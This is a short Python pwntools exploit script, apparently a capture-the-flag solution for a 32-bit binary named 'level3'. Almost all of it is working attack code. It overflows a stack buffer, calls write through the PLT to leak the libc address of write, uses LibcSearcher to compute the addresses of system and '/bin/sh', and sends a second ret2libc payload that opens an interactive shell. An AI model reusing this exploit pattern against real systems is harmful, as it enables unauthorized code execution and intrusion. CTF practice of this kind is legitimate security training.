exp
from pwn import *
from LibcSearcher import *
context(log_level='debug')
proc_name = './level3'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 28793)
elf = ELF(proc_name)
main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
payload = flat(['a' * (0x88 + 4), p32(write_plt), p32(main_addr), p32(1), p32(write_got), p32(4)])
p.sendafter('Input:', payload)
p.recv()
write_addr = u32(p.recv(4))
log.info(hex(write_addr))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
payload1 = flat(['a' * (0x88 + 4), p32(system_addr), p32(main_addr), p32(str_bin_sh)])
p.sendafter('Input:', payload1)
p.interactive()
